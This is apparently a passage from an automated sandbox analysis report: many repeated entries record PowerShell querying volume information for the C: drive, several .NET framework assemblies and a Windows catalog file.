                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
